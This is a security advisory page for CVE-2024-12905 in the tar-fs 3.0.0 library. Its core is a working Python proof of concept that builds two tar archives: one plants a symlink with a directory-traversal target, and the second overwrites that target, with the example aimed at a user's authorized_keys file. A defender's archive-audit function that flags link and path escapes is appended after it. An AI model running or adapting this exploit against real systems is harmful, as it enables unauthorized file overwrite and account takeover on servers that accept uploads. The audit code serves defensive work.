tar-fs 3.0.0 Arbitrary File Write/Overwrite
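This vulnerability exists in tar-fs version 3.0.0. It allows an attacker who uploads two specially crafted tar files (stage_1.tar and stage_2.tar) to create a symbolic link and then write or overwrite arbitrary files on the system.
2025-5-6 20:38:37 Author: cxsecurity.com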


# Exploit Title: tar-fs 3.0.0 - Arbitrary File Write/Overwrite
# Date: 17th April, 2024
# Exploit Author: Ardayfio Samuel Nii Aryee
# Software link: https://github.com/mafintosh/tar-fs
# Version: tar-fs 3.0.0
# Tested on: Ubuntu
# CVE: CVE-2024-12905

# Run the command: Example: python3 exploit.py authorized_keys ../../../../../../../../home/user1/authorized_keys
# This will generate two tar files: stage_1.tar and stage_2.tar
# Upload stage_1.tar first to unarchive the symlink
# Next, upload stage_2.tar to finally write/overwrite the file on the system

import os
import sys
import tarfile

link_name = "normal_file"

def check_arguments():
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <path_to_file_contents> <path_to_target_file_to_overwrite>\n\
            Example: {sys.argv[0]} authorized_keys ../../../../../../../../home/user1/authorized_keys\
        ")
        sys.exit()

    content_file_path = sys.argv[1]
    target_file_path = sys.argv[2]

    return content_file_path, target_file_path

def create_symlink(link_name, target_path):
    os.symlink(target_path, link_name)
    print(f"[+] Created symlink: {link_name} -> {target_path}")

def archive_files(archive_name, file_path):
    # Both archives store their single entry under the same name (link_name).
    tar = tarfile.open(archive_name, 'w')
    tar.add(file_path, link_name, recursive=False)
    tar.close()
    print(f"[+] Archived to: {archive_name}")

def main():
    content_path, target_file = check_arguments()

    stage_1_archive_name = "stage_1.tar"
    stage_2_archive_name = "stage_2.tar"

    create_symlink(link_name, target_file)

    archive_files(stage_1_archive_name, link_name)
    archive_files(stage_2_archive_name, content_path)

if __name__ == "__main__":
    main()
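A defender-side check for the two-stage pattern described above, as an added example that is not part of the original advisory or of the tar-fs project: it audits an archive before extraction and refuses entries whose write path or link target resolves outside the destination, including through a symlink left behind by an earlier upload. The function names, the `uploads` directory and the sample archives are constructed for illustration.

```python
import io, os, tarfile, tempfile

def inside(root: str, path: str) -> bool:
    return os.path.commonpath([root, path]) == root

def audit(archive: bytes, dest: str) -> list:
    """Return reasons to refuse extracting `archive` into `dest` (empty list = clean)."""
    root = os.path.realpath(dest)
    findings = []
    with tarfile.open(fileobj=io.BytesIO(archive)) as tar:
        for m in tar.getmembers():
            path = os.path.join(root, m.name)
            # realpath follows links already on disk, so a link planted by an
            # earlier upload (the stage_1 step) is caught when stage_2 arrives.
            if not inside(root, os.path.realpath(path)):
                findings.append(f"{m.name}: write would land outside destination")
            if m.issym() or m.islnk():
                # Symlink targets are relative to the link; hardlinks to the root.
                base = os.path.dirname(path) if m.issym() else root
                if not inside(root, os.path.realpath(os.path.join(base, m.linkname))):
                    findings.append(f"{m.name}: link target escapes destination")
    return findings

def make_tar(name: str, linkname: str = "", data: bytes = b"") -> bytes:
    """Constructed sample archive with one entry (a symlink if linkname is set)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name)
        if linkname:
            info.type, info.linkname = tarfile.SYMTYPE, linkname
            tar.addfile(info)
        else:
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "uploads")
        os.mkdir(dest)
        benign = audit(make_tar("notes.txt", data=b"hi"), dest)
        stage_1 = audit(make_tar("normal_file", linkname="../outside.txt"), dest)
        # Simulate a destination where an earlier, unaudited extraction left the link.
        os.symlink(os.path.join(tmp, "outside.txt"), os.path.join(dest, "normal_file"))
        stage_2 = audit(make_tar("normal_file", data=b"x"), dest)
    return {"benign": benign, "stage_1": stage_1, "stage_2": stage_2}
```

The second check matters because the stage_2 archive contains only a regular file and looks harmless on its own; it is flagged only when the audit resolves its path against what is already in the destination.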



 



Source: https://cxsecurity.com/issue/WLB-2025050015